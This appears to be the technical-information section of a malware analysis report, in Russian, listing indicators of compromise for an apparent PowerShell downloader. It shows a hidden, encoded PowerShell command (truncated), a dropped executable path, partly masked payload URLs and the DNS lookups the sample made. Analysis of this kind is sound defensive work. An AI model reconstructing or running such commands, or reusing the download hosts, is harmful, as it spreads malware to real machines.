Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAGwAbwB5AGwAZABzAHUAPQAnAE0AcwBiAGUAaQBnAGQAZAB2AGQAawBwAGoAJwA7ACQARQBvAHUAZgBjAHIAcgByAHMAaQAgAD0AIAAnADQANgAzACcAOwAkAFYAbQBqAHkAdgBrAGUAZABhAG0AegB0AD0AJwBVAHkAYwBoAGMAYgB...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\463.exe
- http://an###ton.com/cgi-bin/vEmYPW/
- http://me##one.ir/mukcrl/OljlRgz/
- http://de####.jmcnet.com/wp-includes/a2pp6-uvy09ezl-9235065556/
- DNS ASK si###gica.es
- DNS ASK an###ton.com
- DNS ASK me##one.ir
- DNS ASK de####.jmcnet.com
- DNS ASK es####estela.com